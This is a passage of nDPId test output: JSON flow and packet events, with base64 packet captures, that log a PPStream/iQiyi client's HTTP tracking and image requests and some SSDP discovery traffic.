{"hostname":"msg.71.am","url":"msg.71.am\/core?t=11&ct=adend&reset=0&ra=1&pf=201&p=11&p1=114&p2=3000&sdktp=1&c1=31&r=479531000&aid=180932301&u=aaoefdtqgfdepxc2tnv3piucgcb4eofn&pu=&os=Windows%207&v=5%2E2%2E15%2E2240&krv=2%2E0%2E102&dt=&hu=-1&rn=1467353195&islocal=0&as=0311c5a0d5596063db5944bd76b6cbff&ve=b1f90f8da6fe0258d13616a8070cb997&pe=&vfrm=&chl=&hcdnv=10.0.0.293&tpcd=0&isdrm=1&ht=0","code":0,"content_type":"","user_agent":"QY-Player-Windows\/2.0.102"}} +00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1456,"source":"pps.pcap","alias":"nDPId-test","flow_id":100,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353196441,"flow_last_seen":1467353196441,"flow_idle_time":7560000,"flow_min_l4_payload_len":340,"flow_max_l4_payload_len":340,"flow_tot_l4_payload_len":340,"flow_avg_l4_payload_len":340,"midstream":1,"thread_ts_msec":1467353196441,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"111.206.22.77","src_port":50776,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00908{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1456,"source":"pps.pcap","alias":"nDPId-test","flow_id":100,"flow_packet_id":1,"flow_last_seen":1467353196441,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":394,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":394,"pkt_l4_len":360,"thread_ts_msec":1467353196441,"pkt":"TF4M6gNlABxCjnAxCABFAAF8MmRAAIAGDUzAqHMIb84WTcZYAFAHr7sEMj+LIFAYAQTIFgAAR0VUIC9iP3Q9MTEmcGY9MjAxJnA9MTEmcDE9MTE0JnMxPTAmY3Q9MTQwODE5X2Fkc3luJmFkc3luPTEmYnJpbmZvPUlFX0lFOV85LjAuODExMi4xNjQyMV8xJm9zPVdpbmRvd3MlMjA3JnJuPTE5MjUyJnU9YWFvZWZkdHFnZmRlcHhjMnRudjNwaXVjZ2NiNGVvZm4mdj01LjIuMTUuMjI0MCBIVFRQLzEuMQ0KVXNlci1BZ2VudDogUWl5aSBMaXN0IENsaWVudCBQQyA1LjIuMTUuMjI0MA0KSG9zdDogbXNnLmlxaXlpLmNvbQ0KQWNjZXB0LUVuY29kaW5nOiBnemlwDQpQcmFnbWE6IG5vLWNhY2hlDQpDYWNoZS1Db250cm9sOiBuby1jYWNoZQ0KQ29ubmVjdGlvbjogY2xvc2UNCkFjY2VwdDogKi8qDQoNCg=="} +00940{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1456,"source":"pps.pcap","alias":"nDPId-test","flow_id":100,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353196441,"flow_last_seen":1467353196441,"flow_idle_time":7560000,"flow_min_l4_payload_len":340,"flow_max_l4_payload_len":340,"flow_tot_l4_payload_len":340,"flow_avg_l4_payload_len":340,"midstream":1,"thread_ts_msec":1467353196441,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"111.206.22.77","src_port":50776,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.PPStream","breed":"Fun","category":"Streaming"},"http": {"hostname":"msg.iqiyi.com","url":"msg.iqiyi.com\/b?t=11&pf=201&p=11&p1=114&s1=0&ct=140819_adsyn&adsyn=1&brinfo=IE_IE9_9.0.8112.16421_1&os=Windows%207&rn=19252&u=aaoefdtqgfdepxc2tnv3piucgcb4eofn&v=5.2.15.2240","code":0,"content_type":"","user_agent":"Qiyi List Client PC 5.2.15.2240"}} +00648{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1457,"source":"pps.pcap","alias":"nDPId-test","flow_id":99,"flow_packet_id":2,"flow_last_seen":1467353196523,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":199,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":199,"pkt_l4_len":165,"thread_ts_msec":1467353196523,"pkt":"ABxCjnAxTF4M6gNlCABFAAC5bd1AADMGzGnKbA7bwKhzCABQxlZz\/QmHa0ch+1AYADbMuQAASFRUUC8xLjEgMjAwIE9LDQpTZXJ2ZXI6IG5naW54LzEuNC43DQpEYXRlOiBGcmksIDAxIEp1bCAyMDE2IDA2OjA2OjM1IEdNVA0KQ29udGVudC1UeXBlOiB0ZXh0L2h0bWwNCkNvbnRlbnQtTGVuZ3RoOiAwDQpDb25uZWN0aW9uOiBrZWVwLWFsaXZlDQoNCg=="} +00641{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1458,"source":"pps.pcap","alias":"nDPId-test","flow_id":100,"flow_packet_id":2,"flow_last_seen":1467353196535,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":194,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":194,"pkt_l4_len":160,"thread_ts_msec":1467353196535,"pkt":"ABxCjnAxTF4M6gNlCABFAAC07BRAADMGoWNvzhZNwKhzCABQxlgyP4sgB6+8WFAYAB\/IEQAASFRUUC8xLjEgMjAwIE9LDQpTZXJ2ZXI6IG5naW54LzEuOC4wDQpEYXRlOiBGcmksIDAxIEp1bCAyMDE2IDA2OjA2OjM2IEdNVA0KQ29udGVudC1UeXBlOiB0ZXh0L2h0bWwNCkNvbnRlbnQtTGVuZ3RoOiAwDQpDb25uZWN0aW9uOiBjbG9zZQ0KDQo="} +00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1459,"source":"pps.pcap","alias":"nDPId-test","flow_id":101,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353196740,"flow_last_seen":1467353196740,"flow_idle_time":7560000,"flow_min_l4_payload_len":1132,"flow_max_l4_payload_len":1132,"flow_tot_l4_payload_len":1132,"flow_avg_l4_payload_len":1132,"midstream":1,"thread_ts_msec":1467353196740,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"111.206.22.77","src_port":50777,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +01967{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1459,"source":"pps.pcap","alias":"nDPId-test","flow_id":101,"flow_packet_id":1,"flow_last_seen":1467353196740,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":1186,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1186,"pkt_l4_len":1152,"thread_ts_msec":1467353196740,"pkt":"TF4M6gNlABxCjnAxCABFAASUMuBAAIAGCbjAqHMIb84WTcZZAFAJ9c2nhBlkGlAYAQR8TQAAR0VUIC9iP3BmPTIwMSZwPTExJnAxPTExNCZhcD0wJnNvdXJjZTE9bGlzdCZzb3VyY2UyPW9ubGluZV9sJnQ9MTEmY3Q9cGNfX2FkX3BsYXkmYWxidW1faWQ9MTgwOTMyMzAxJmMxPTQ3OTUzMTAwMCZjbHQ9aG9tZWRsJmNuPTE2MDUwNS0lRTYlQUQlQTMlRTclODklODclRUYlQkMlOUElRTklODMlOTElRTYlODElQkElRTYlQUMlQTclRTUlQjclQjQlRTQlQkElOEMlRTYlQUMlQTElRTUlQkQlOTIlRTYlOUQlQTUlRTUlOEYlOEQlRTklODAlODYlRTglQTIlQUQtJUU0JUJCJThBJUU2JTk5JTlBODAlRTUlOTAlOEUlRTglODQlQjElRTUlOEYlQTMlRTclQTclODAmY3B1dXNlPTMyLjgmZGU9MzJlNjU0ZmE1N2JlOTBlYzYzOGM0NmRkZmRkNjY3NTcmZGxsdj1hcHB2JTNENS4wLjAuMTAwMyU3Q29sdiUzRDUuMC4wLjExMDEmZXQ9MCZmdD0yMTc1Jmh0PTAmaHU9LTEma3Y9MTAuMC4wLjI5MyZsYW5nPSZtZW1waHk9NjUmbWVtdmlyPTEyMCZtdD0wJm12PTUuMi4xNS4yMjQwJnAyPTEwMTEmcGU9JnBvcHQ9MCZwdD0wJnB0eXBlPTEmcHU9JnI9NDc5NTMxMDAwJnJfaWQ9NDc5NTMxMDAwJnJhPTEmcm49MjA1MjYmc2Nobl9pZD0yMDAwMDM3MTklMjQlMjQlMjQlMjQxODA5MzIzMDEmc2Nobl9uYW1lPSVFNyVCQiVCQyVFOCU4OSVCQSVFNSVBOCVCMSVFNCVCOSU5MCUyNCUyNCUyNCUyNCVFNCVCQiU4QSVFNiU5OSU5QTgwJUU1JTkwJThFJUU4JTg0JUIxJUU1JThGJUEzJUU3JUE3JTgwJnNwdD0xNDY3MzUzMTk2JnN0YWdlPTImc3RpbWU9MCZ0dmlkPTQ3OTUzMTAwMCZ1PWFhb2VmZHRxZ2ZkZXB4YzJ0bnYzcGl1Y2djYjRlb2ZuJnVwbG9hZF9pZD0mdXJsPWh0dHAlM0ElMkYlMkZ3d3cuaXFpeWkuY29tJTJGdl8xOXJybHZ1eGxnLmh0bWwmdj0yLjAuMTAyLjMwMTQ3JnZlPTMzMzgyNWNkZjQ4NmNjOTRiNmQyOTU2ZjRkZTZkNGNiJnZpZD0yYjk0NzI5ZTNhOTIwYjIxMTk4ODZjNWM2NzdhZTlkYiBIVFRQLzEuMQ0KVXNlci1BZ2VudDogUWl5aSBMaXN0IENsaWVudCBQQyA1LjIuMTUuMjI0MA0KSG9zdDogbXNnLmlxaXlpLmNvbQ0KQWNjZXB0LUVuY29kaW5nOiBnemlwDQpQcmFnbWE6IG5vLWNhY2hlDQpDYWNoZS1Db250cm9sOiBuby1jYWNoZQ0KQ29ubmVjdGlvbjogY2xvc2UNCkFjY2VwdDogKi8qDQoNCg=="} +01736{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1459,"source":"pps.pcap","alias":"nDPId-test","flow_id":101,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353196740,"flow_last_seen":1467353196740,"flow_idle_time":7560000,"flow_min_l4_payload_len":1132,"flow_max_l4_payload_len":1132,"flow_tot_l4_payload_len":1132,"flow_avg_l4_payload_len":1132,"midstream":1,"thread_ts_msec":1467353196740,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"111.206.22.77","src_port":50777,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.PPStream","breed":"Fun","category":"Streaming"},"http": {"hostname":"msg.iqiyi.com","url":"msg.iqiyi.com\/b?pf=201&p=11&p1=114&ap=0&source1=list&source2=online_l&t=11&ct=pc__ad_play&album_id=180932301&c1=479531000&clt=homedl&cn=160505-%E6%AD%A3%E7%89%87%EF%BC%9A%E9%83%91%E6%81%BA%E6%AC%A7%E5%B7%B4%E4%BA%8C%E6%AC%A1%E5%BD%92%E6%9D%A5%E5%8F%8D%E9%80%86%E8%A2%AD-%E4%BB%8A%E6%99%9A80%E5%90%8E%E8%84%B1%E5%8F%A3%E7%A7%80&cpuuse=32.8&de=32e654fa57be90ec638c46ddfdd66757&dllv=appv%3D5.0.0.1003%7Colv%3D5.0.0.1101&et=0&ft=2175&ht=0&hu=-1&kv=10.0.0.293&lang=&memphy=65&memvir=120&mt=0&mv=5.2.15.2240&p2=1011&pe=&popt=0&pt=0&ptype=1&pu=&r=479531000&r_id=479531000&ra=1&rn=20526&schn_id=200003719%24%24%24%24180932301&schn_name=%E7%BB%BC%E8%89%BA%E5%A8%B1%E4%B9%90%24%24%24%24%E4%BB%8A%E6%99%9A80%E5%90%8E%E8%84%B1%E5%8F%A3%E7%A7%80&spt=1467353196&stage=2&stime=0&tvid=479531000&u=aaoefdtqgfdepxc2tnv3piucgcb4eofn&upload_id=&url=http%3A%2F%2Fwww.iqiyi.com%2Fv_19rrlvuxlg.html&v=2.0.102.30147&ve=333825cdf486cc94b6d2956f4de6d4cb&vid=2b94729e3a920b2119886c5c677ae9db","code":0,"content_type":"","user_agent":"Qiyi List Client PC 5.2.15.2240"}} +00640{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1460,"source":"pps.pcap","alias":"nDPId-test","flow_id":101,"flow_packet_id":2,"flow_last_seen":1467353196835,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":194,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":194,"pkt_l4_len":160,"thread_ts_msec":1467353196835,"pkt":"ABxCjnAxTF4M6gNlCABFAAC0DHtAADMGgP1vzhZNwKhzCABQxlmEGWQaCfXSE1AYACGFOQAASFRUUC8xLjEgMjAwIE9LDQpTZXJ2ZXI6IG5naW54LzEuOC4wDQpEYXRlOiBGcmksIDAxIEp1bCAyMDE2IDA2OjA2OjM2IEdNVA0KQ29udGVudC1UeXBlOiB0ZXh0L2h0bWwNCkNvbnRlbnQtTGVuZ3RoOiAwDQpDb25uZWN0aW9uOiBjbG9zZQ0KDQo="} +00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1461,"source":"pps.pcap","alias":"nDPId-test","flow_id":102,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353196856,"flow_last_seen":1467353196856,"flow_idle_time":7560000,"flow_min_l4_payload_len":249,"flow_max_l4_payload_len":249,"flow_tot_l4_payload_len":249,"flow_avg_l4_payload_len":249,"midstream":1,"thread_ts_msec":1467353196856,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"223.26.106.20","src_port":50778,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00785{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1461,"source":"pps.pcap","alias":"nDPId-test","flow_id":102,"flow_packet_id":1,"flow_last_seen":1467353196856,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":303,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":303,"pkt_l4_len":269,"thread_ts_msec":1467353196856,"pkt":"TF4M6gNlABxCjnAxCABFAAEhMu5AAIAGSgnAqHMI3xpqFMZaAFCbMnrue8hN51AYAQSXSQAAR0VUIC9wcmVpbWFnZS8yMDE2MDUwNi9mMC8xZi92XzExMDM1OTk5OF9tXzYxMV8xNjBfOTBfMS5qcGc\/bm89MSBIVFRQLzEuMQ0KVXNlci1BZ2VudDogUWl5aSBMaXN0IENsaWVudCBQQyA1LjIuMTUuMjI0MA0KSG9zdDogcHJlaW1hZ2UxLnFpeWlwaWMuY29tDQpBY2NlcHQtRW5jb2Rpbmc6IGd6aXANClByYWdtYTogbm8tY2FjaGUNCkNhY2hlLUNvbnRyb2w6IG5vLWNhY2hlDQpDb25uZWN0aW9uOiBjbG9zZQ0KQWNjZXB0OiAqLyoNCg0K"} +00861{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1461,"source":"pps.pcap","alias":"nDPId-test","flow_id":102,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353196856,"flow_last_seen":1467353196856,"flow_idle_time":7560000,"flow_min_l4_payload_len":249,"flow_max_l4_payload_len":249,"flow_tot_l4_payload_len":249,"flow_avg_l4_payload_len":249,"midstream":1,"thread_ts_msec":1467353196856,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"223.26.106.20","src_port":50778,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.PPStream","breed":"Fun","category":"Streaming"},"http": {"hostname":"preimage1.qiyipic.com","url":"preimage1.qiyipic.com\/preimage\/20160506\/f0\/1f\/v_110359998_m_611_160_90_1.jpg?no=1","code":0,"content_type":"","user_agent":"Qiyi List Client PC 5.2.15.2240"}} +02154{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1462,"source":"pps.pcap","alias":"nDPId-test","flow_id":102,"flow_packet_id":2,"flow_last_seen":1467353196917,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":1314,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1314,"pkt_l4_len":1280,"thread_ts_msec":1467353196917,"pkt":"ABxCjnAxTF4M6gNlCABFAAUUDjVAADgGss\/fGmoUwKhzCABQxlp7yE3nmzJ751AQAB9cGQAASFRUUC8xLjEgMjAwIE9LDQpTZXJ2ZXI6IFFXUw0KRGF0ZTogRnJpLCAwMSBKdWwgMjAxNiAwNjowNjozNiBHTVQNCkNvbnRlbnQtVHlwZTogaW1hZ2UvanBlZw0KQ29udGVudC1MZW5ndGg6IDY2MTIxMQ0KQ29ubmVjdGlvbjogY2xvc2UNCkV4cGlyZXM6IEZyaSwgMDUgTWF5IDIwMTcgMTc6MzU6NTUgR01UDQpDYWNoZS1Db250cm9sOiBtYXgtYWdlPTMxNTM2MDAwDQpBY2NlcHQtUmFuZ2VzOiBieXRlcw0KTGFzdC1Nb2RpZmllZDogVGh1LCAwNSBNYXkgMjAxNiAxNjoyMzo1NSBHTVQNClgtQ2FjaGU6IGZyb20gMTI3LjAuMC4xDQpBZ2U6IDQ4ODM0NDENClZpYTogaHR0cC8xLjEgUVRTIChRVFMgW2NIcyBmIF0pDQpYLUNhY2hlOiBmcm9tIDEwLjIyMS4zMi4yMTYNClgtQ2FjaGU6IE1JU1MgZnJvbSAyMjMuMjYuMTA2LjIwDQoNCv\/Y\/+AAEEpGSUYAAQEAAAEAAQAA\/9sAQwADAgIDAgIDAwMDBAMDBAUIBQUEBAUKBwcGCAwKDAwLCgsLDQ4SEA0OEQ4LCxAWEBETFBUVFQwPFxgWFBgSFBUU\/9sAQwEDBAQFBAUJBQUJFA0LDRQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQU\/\/4AC3FpeWkxLjAuM\/\/AABEIA4QGQAMBIgACEQEDEQH\/xAAeAAACAwADAQEBAAAAAAAAAAAGBwQFCAIDCQABCv\/EAHAQAAEDAwMCAwUEBAoDCgcAIwECAwQFBhEAEiEHMRMiQQgUUWFxFSMygUKRobEJFiQzUmJywdHwJYLhFzRDc5KywsTS1CY1U2Oiw\/EYNkR0g4aTlKSz01RWZGZ1doSjtBknRUZVhZWWxdW14jdXZf\/EAB0BAAIDAQEBAQEAAAAAAAAAAAUGAwQHAgEIAAn\/xABKEQACAQMDAQUEBwYFAwQBAQkBAgMABBEFEiExBhMiQVEUYXGRIzKBobHB0QcVJELh8DM0UmJyFiXxJjU2Q4KSF0RTc6LCY7LS\/9oADAMBAAIRAxEAPwDytAyeNWtFoU6vyTFgRlSXcbsJ9B8fl+eqxHqdN32eupf+5vW5UmPVHaHUHUpMapNHCmlDdxnBxnP7NTSEouRRHT4I7mdYpW2g0MdQukl49JKsmm3fb0+gS3BuZ97aKUPpwDubWPK4MKHKVEc6GfB+71qP21vapV7RkmgxSmNKRQ8iNNSkh8JU22lxLigdq962\/E4T5c4BOs+RYyXt+9GvEJIzXtxb9zIY85++q2mvKhvb0f6yf6Q1fvM+8sb2vwajqp2x9KEaMLI6f1e5vG9xjq92\/SfdVsZCvmo9z8k5+mpopSG2jmvYSyHaelDtuyUwH0vLXs82ngvqqxcNDk0eP4PljJZU\/wCH5nMjBx9B66X\/AFL6K3H04lNe+x25cNxhuQ3JiKK0bVDI3DgpPxyPz0GUyqzaa9vjp93WrCfER6D4jRLayjnijVvclPAKOG4EOlTUKQvwv6qv0vppy2vUkLpxXv3o2+XSltd5ittlC0KkPf8ACSZPJ47AZ9NGTdbjURtq"} +02161{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1463,"source":"pps.pcap","alias":"nDPId-test","flow_id":102,"flow_packet_id":3,"flow_last_seen":1467353196917,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":1314,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1314,"pkt_l4_len":1280,"thread_ts_msec":1467353196917,"pkt":"ABxCjnAxTF4M6gNlCABFAAUUDjZAADgGss7fGmoUwKhzCABQxlp7yFLTmzJ751AQAB+1AQAAFHWnfu3ebsPmflqKi8LbOppt0aSln8a0oQnzOKX6fXTzo\/s7tX30MrdPrafdJ9wOpqEVa0+eCttATGWR8cDKh8HCNIf2Y7kse++qsW3Z9ZRJmISqRHhlv7ua8gbtu88KwMqCRndtPwwr0FYe3t6IW8WfGaEajdpKO6T7a8f7q6eXHYM73S46PKpTyVFtK32z4SyP6Dn4VD6HUejUGdXqrT6VTI\/vdSmvtxYrHiJaC1rVtGVnhKfUlR4AJ16QVv3OsV+5oM2OzU4HhtpejSW0raWT2G05\/CnHPx0obh9myNSbjod09Pap\/FmsUupt1BtqSFvxFhIVlBSDuGc4POMZxg6\/XEcyITHyaXYrUM4B6Gst3D0dv22KjesSo2u6f4mtIdrsiFKafZjNrwULQrI8Tck7ylIyACVAaiTOjt7U2gUet1O2pFNpVZYVKp8lx5twPNBIWVHYo+Gdp3bV4OAT6a0xfk3q\/SqN1XjzmEVOHe7qXEyae+XGKY3w2pLbYTkbmQG1KIB8iTyd2lNevUKq1roxZ9hNOOsfYa1eNIShLQeSlstNIGw5O1CnASr8W7nOlh7u7jOGFMEOl2hfEkoApQO9P60p+VHRCeW9Ec2SG0srUtlWCdqwE+U4B4Vj8OhesUp+lSlx5aPCeR+JH6Q5wQfgc8YOmdXrjbcYne5Ux2lTJLiXHJbVVkuLOM\/i3K8xIJGVZ+Whhi7ZNK97Rs94XJTtcddcO4\/iJyfiSrOdXLa6mdvGK5v7Kygi320m41QWoypc57\/iT+8apK8zsqsv\/jDpm2pcKnrVl09bSdkbwvvd310AXb\/41P8AxaP3aMQybnNCnTFuDTCmX\/AehhjDIbSAPKnVJGrkeoyvd4EUynsZ2oT6D4nPH5n5aB6xc36KEI3fQaNvZ9v2pWncEydBmyKVU3Ep92qEfylsjdxnHGd37OdCJbRljMvU0q6Zo8N7cql0+1T5129VKLc\/Syqil3Xa9Qt6Y4kqZEyPtQ+njzNODyuDBTkpJxuGdLxuRMrLm2NCed3f0Ua2H7T3WGX7SU6g\/bURj3OhpKYcnGJKkqabS6HFA7Vblo8TAAx2ydKmO5DpLKWocZKNv6WdWraPwBzwa8vLeGwmMKDcR6HNLKkWS6k+LPgSD8vTRRGTIZ2tQ6a6P7RGNXc64okVKlPvo+m7QlVup7Dfkjqb\/I6u7iPOh+55T9XirgVKTSfPK4\/qJc1El3vLmJU2xD\/1lk6Cn788Zwq2hav62Tr4Xw5t8qUj\/V1x3j\/y8VaEMnklWFQg1yY2l9X3TKzhPwOO\/wCrOulNLqCW9q5pS38E5xrn\/HR+bQfdURl+9Ik+MiUCQkp27S3t7ZJwd2dc7URUalWIrlTZe+yVFXiOKSdnrjJHzx664DsR1oitrcEgAYqJ4K4v4Xx+rXwlFKfM\/wDs0YdYLVi2\/R6VPpjS\/DlZS67HytltSOVZVk4J3JIB+fOlYZC9vm8356mTGM1O9q8bbSc1bSFNq3bXV7tdLCXHlbfHA4yVHOAB+v8AdqvebmNspfcQUtr7HXFp7wVbtxV6HUrHCHb1qxDGAw39KNZfTyrU1Q94TGRmImaFLfH8yr8Kvz+HfUumWDVqp44YfiL8BxDToEgJCFKKgkHPx2q5Hw510nqOxJTJT\/Fqmp8SP7sOM+HyrCx\/X8xyeO6vUjFt"} 00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1601,"source":"pps.pcap","alias":"nDPId-test","flow_id":103,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353197131,"flow_last_seen":1467353197131,"flow_idle_time":180000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":133,"flow_avg_l4_payload_len":133,"midstream":0,"thread_ts_msec":1467353197131,"l3_proto":"ip4","src_ip":"192.168.115.1","dst_ip":"239.255.255.250","src_port":50945,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00621{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1601,"source":"pps.pcap","alias":"nDPId-test","flow_id":103,"flow_packet_id":1,"flow_last_seen":1467353197131,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":175,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":175,"pkt_l4_len":141,"thread_ts_msec":1467353197131,"pkt":"AQBef\/\/6dNArkea6CABFAAChc\/sAAAERIa3AqHMB7\/\/\/+scBB2wAjWbYTS1TRUFSQ0ggKiBIVFRQLzEuMQ0KSG9zdDoyMzkuMjU1LjI1NS4yNTA6MTkwMA0KU1Q6dXJuOnNjaGVtYXMtdXBucC1vcmc6ZGV2aWNlOkludGVybmV0R2F0ZXdheURldmljZToxDQpNYW46InNzZHA6ZGlzY292ZXIiDQpNWDozDQoNCg=="} 00645{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1601,"source":"pps.pcap","alias":"nDPId-test","flow_id":103,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353197131,"flow_last_seen":1467353197131,"flow_idle_time":180000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":133,"flow_avg_l4_payload_len":133,"midstream":0,"thread_ts_msec":1467353197131,"l3_proto":"ip4","src_ip":"192.168.115.1","dst_ip":"239.255.255.250","src_port":50945,"dst_port":1900,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} 00605{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1686,"source":"pps.pcap","alias":"nDPId-test","flow_id":103,"flow_packet_id":2,"flow_last_seen":1467353197240,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":165,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":165,"pkt_l4_len":131,"thread_ts_msec":1467353197240,"pkt":"AQBef\/\/6dNArkea6CABFAACXc\/0AAAERIbXAqHMB7\/\/\/+scBB2wAg2oBTS1TRUFSQ0ggKiBIVFRQLzEuMQ0KSG9zdDoyMzkuMjU1LjI1NS4yNTA6MTkwMA0KU1Q6dXJuOnNjaGVtYXMtdXBucC1vcmc6ZGV2aWNlOk1lZGlhU2VydmVyOjENCk1hbjoic3NkcDpkaXNjb3ZlciINCk1YOjMNCg0K"} 00609{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1687,"source":"pps.pcap","alias":"nDPId-test","flow_id":103,"flow_packet_id":3,"flow_last_seen":1467353197271,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":167,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":167,"pkt_l4_len":133,"thread_ts_msec":1467353197271,"pkt":"AQBef\/\/6dNArkea6CABFAACZc\/4AAAERIbLAqHMB7\/\/\/+scBB2wAhQmdTS1TRUFSQ0ggKiBIVFRQLzEuMQ0KSG9zdDoyMzkuMjU1LjI1NS4yNTA6MTkwMA0KU1Q6dXJuOnNjaGVtYXMtdXBucC1vcmc6ZGV2aWNlOk1lZGlhUmVuZGVyZXI6MQ0KTWFuOiJzc2RwOmRpc2NvdmVyIg0KTVg6Mw0KDQo="} -00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1995,"source":"pps.pcap","alias":"nDPId-test","flow_id":104,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353197951,"flow_last_seen":1467353197951,"flow_idle_time":7440000,"flow_min_l4_payload_len":1260,"flow_max_l4_payload_len":1260,"flow_tot_l4_payload_len":1260,"flow_avg_l4_payload_len":1260,"midstream":1,"thread_ts_msec":1467353197951,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"111.206.22.77","src_port":50779,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -02136{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1995,"source":"pps.pcap","alias":"nDPId-test","flow_id":104,"flow_packet_id":1,"flow_last_seen":1467353197951,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":1314,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1314,"pkt_l4_len":1280,"thread_ts_msec":1467353197951,"pkt":"TF4M6gNlABxCjnAxCABFAAUUM2tAAIAGCK3AqHMIb84WTcZbAFDJCjAgTd\/tYVAQAQRxYwAAR0VUIC9iP3BmPTIwMSZwPTExJnAxPTExNCZhcD0wJnNvdXJjZTE9bGlzdCZzb3VyY2UyPW9ubGluZV9sJnQ9MjAxJmN0PWNsdF9fcGxfcGxheSZhbGJ1bV9pZD0xODA5MzIzMDEmYzE9NDc5NTMxMDAwJmNsdD1ob21lZGwmY249MTYwNTA1LSVFNiVBRCVBMyVFNyU4OSU4NyVFRiVCQyU5QSVFOSU4MyU5MSVFNiU4MSVCQSVFNiVBQyVBNyVFNSVCNyVCNCVFNCVCQSU4QyVFNiVBQyVBMSVFNSVCRCU5MiVFNiU5RCVBNSVFNSU4RiU4RCVFOSU4MCU4NiVFOCVBMiVBRC0lRTQlQkIlOEElRTYlOTklOUE4MCVFNSU5MCU4RSVFOCU4NCVCMSVFNSU4RiVBMyVFNyVBNyU4MCZjcHV1c2U9MTQuMSZkZT0zMmU2NTRmYTU3YmU5MGVjNjM4YzQ2ZGRmZGQ2Njc1NyZkbGx2PWFwcHYlM0Q1LjAuMC4xMDAzJTdDb2x2JTNENS4wLjAuMTEwMSZldD0wJmZ0PTIxNzUmaHQ9MCZodT0tMSZpc2RtPTAmaXNsb2NhbD0wJmt2PTEwLjAuMC4yOTMmbGFuZz0mbWVtcGh5PTY3Jm1lbXZpcj0xMjEmbXQ9MCZtdj01LjIuMTUuMjI